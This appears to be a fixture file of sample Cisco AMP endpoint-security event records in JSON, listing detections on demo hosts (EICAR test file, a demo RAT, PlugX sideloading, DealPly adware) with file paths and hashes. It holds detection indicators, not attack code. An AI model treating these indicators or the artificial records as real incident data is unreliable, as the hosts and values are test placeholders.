-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6532893356001853000,"timestamp":1610705046,"timestamp_nanoseconds":928000000,"date":"2021-01-15T10:04:06+00:00","event_type":"Exploit 
Prevention","event_type_id":1090519103,"detection_id":"6532893356001853441","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f5:8f:96:c3:53:1c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"firefox.exe","file_path":"C:\\Program Files\\Mozilla Firefox\\firefox.exe","identity":{"sha256":"4312cdb2ead8fd8d2dd6d8d716f3b6e9717b3d7167a2a0495e4391312102170f","sha1":"6d63da6b10a5cab1e4bd558cfdf606b42428809f","md5":"2ba068373ca5b647129a1a18c2506c32"},"attack_details":{"application":"firefox.exe","attacked_module":"C:\\Program Files\\Mozilla Firefox\\xul.dll","base_address":"0x7D1E0000","suspicious_files":[""],"indicators":[{"tactics":["TA0009"],"severity":"medium","description":"DealPly is adware, which claims to improve your online shopping experience. It is often bundled into other legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements on webpages. 
Adware has also been known to download and install malware.","short_description":"Dealply adware detected","id":"44cfe1c4-3dc4-4619-be6b-88c9d69c2a97","techniques":["T1185"]}]}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055321020891000,"timestamp":1610705042,"timestamp_nanoseconds":901000000,"date":"2021-01-15T10:04:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055321020891148","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s234","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s234","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} 
-{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255571142902000,"timestamp":1610705040,"timestamp_nanoseconds":960000000,"date":"2021-01-15T10:04:00+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255571142901779","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055308135989000,"timestamp":1610705039,"timestamp_nanoseconds":416000000,"date":"2021-01-15T10:03:59+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055308135989259","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":400000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054666","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055299546055000,"timestamp":1610705037,"timestamp_nanoseconds":354000000,"date":"2021-01-15T10:03:57+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055299546054665","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":2148,"disposition":"Clean","file_name":"14","identity":{"sha256":"0b31ad8d43f38eeb0d91a4cf322116c148b4a35107ed400fa1e7ed5aa930dc40","sha1":"55e92c2518167c67b78d2e9037dc37280dcb7e68","md5":"349981d4c225a512cfade6c1fe6f1cf4"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255523898262000,"timestamp":1610705029,"timestamp_nanoseconds":26000000,"date":"2021-01-15T10:03:49+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255523898261522","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055260891349000,"timestamp":1610705028,"timestamp_nanoseconds":744000000,"date":"2021-01-15T10:03:48+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055260891349000","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055248006447000,"timestamp":1610705025,"timestamp_nanoseconds":103000000,"date":"2021-01-15T10:03:45+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055248006447111","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1j4","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1j4","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":119000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512518","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055239416513000,"timestamp":1610705023,"timestamp_nanoseconds":72000000,"date":"2021-01-15T10:03:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055239416512517","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1636,"disposition":"Clean","file_name":"chkdsk.exe","identity":{"sha256":"d83493f0c69719cb3c50599081851185a5b4846ac7a3c7ccd4e73da2ed68bd50","sha1":"4c30315b9c16106b542f088921888d83d3f185f7","md5":"5f7eaaf5d10e2a715d5e305ac992b2a7"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055222236643000,"timestamp":1610705019,"timestamp_nanoseconds":978000000,"date":"2021-01-15T10:03:39+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.Eicar.Test","detection_id":"5827055222236643332","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"s1uc","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Desktop\\s1uc","identity":{"sha256":"275a021bbfb6489e54d471899f7db9d1663fc695ec2fe2a2c4538aabf651fd0f","sha1":"3395856ce81f2b7382dee72602f798b642f14140","md5":"44d88612fea8a8f36de82e1278abb02f"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055217941676000,"timestamp":1610705018,"timestamp_nanoseconds":243000000,"date":"2021-01-15T10:03:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055217941676035","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255468063687000,"timestamp":1610705016,"timestamp_nanoseconds":920000000,"date":"2021-01-15T10:03:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255468063686673","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255420819046000,"timestamp":1610705005,"timestamp_nanoseconds":829000000,"date":"2021-01-15T10:03:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6176255420819046416","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1439415395959000600,"timestamp":1610704997,"timestamp_nanoseconds":959000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"Win32.DemoMal.Rat.Client","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610704997,"start_date":"2021-01-15T10:03:17+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900"},"parent":{"disposition":"Malicious","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362818","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\DOCUME~1\\ADMINI~1\\LOCALS~1\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":5827055127747363000,"timestamp":1610704997,"timestamp_nanoseconds":930000000,"date":"2021-01-15T10:03:17+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"Win32.DemoMal.Rat.Client","detection_id":"5827055127747362817","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_SFEicar","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"50:2b:e3:50:58:61"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"3","file_path":"\\\\?\\C:\\Documents and Settings\\Administrator\\Local Settings\\Temp\\3","identity":{"sha256":"1eb15091d4605809a0a78e9c150e764c9253f9249a7babe4484c27d822d59900","sha1":"de789fef4be5d169a17f45ff9e2db31cec7559e9","md5":"083d80e421e213d8379dfc72bf0d5db0"},"parent":{"process_id":1996,"disposition":"Malicious","file_name":"a.exe","identity":{"sha256":"92a6e18d7fff5a28f74e1a3dbc35ed4c09fcba8864faca7eb4e32b7ed8655a7a","sha1":"d24812f04ad9ea8c872833b29cc25047c8b8cdb1","md5":"73f3ff2d2579e74e44f5511b28833dda"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155906501425758000,"timestamp":1610704994,"timestamp_nanoseconds":771000000,"date":"2021-01-15T10:03:14+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155906501425758211","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3168,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176255369279439000,"timestamp":1610704993,"timestamp_nanoseconds":270000000,"date":"2021-01-15T10:03:13+00:00","event_type":"Threat 
